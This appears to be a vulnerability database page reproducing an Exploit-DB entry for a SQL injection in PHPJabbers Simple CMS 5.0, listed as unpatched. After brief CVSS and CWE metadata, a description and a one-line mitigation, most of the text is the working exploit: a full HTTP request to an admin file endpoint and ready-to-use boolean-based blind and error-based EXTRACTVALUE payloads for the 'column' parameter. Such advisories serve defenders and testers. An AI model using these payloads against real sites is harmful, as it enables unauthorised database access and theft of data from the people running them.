PHPJabbers Simple CMS 5.0 - SQL Injection

vendor:

Simple CMS

by:

Ahmet Ümit BAYRAM

7.4

CVSS

HIGH

SQL Injection

CWE

Product Name: Simple CMS

Affected Version From: 5

Affected Version To: 5

Patch Exists: NO

Related CWE:

CPE: a:phpjabbers:simple_cms:5.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2023

PHPJabbers Simple CMS 5.0 – SQL Injection

A SQL injection vulnerability exists in PHPJabbers Simple CMS 5.0. An attacker can send a specially crafted HTTP request to the vulnerable application in order to exploit this vulnerability. The payloads used in the exploit are boolean-based blind and error-based. The boolean-based blind payload is used to replace the original value of the parameter 'column' with a malicious value. The error-based payload is used to extract the value of the parameter 'column' using the EXTRACTVALUE function.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux

### Request ###

GET
/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
HTTP/1.1
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/simplecms/preview.php?lid=1
Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;
_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;
pjd_simplecms=1; last_position=%2F
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

### Parameter & Payloads ###

Parameter: column (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)
THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)
END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
    Payload: action=pjActionGetFile&column=2 AND
EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT
(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10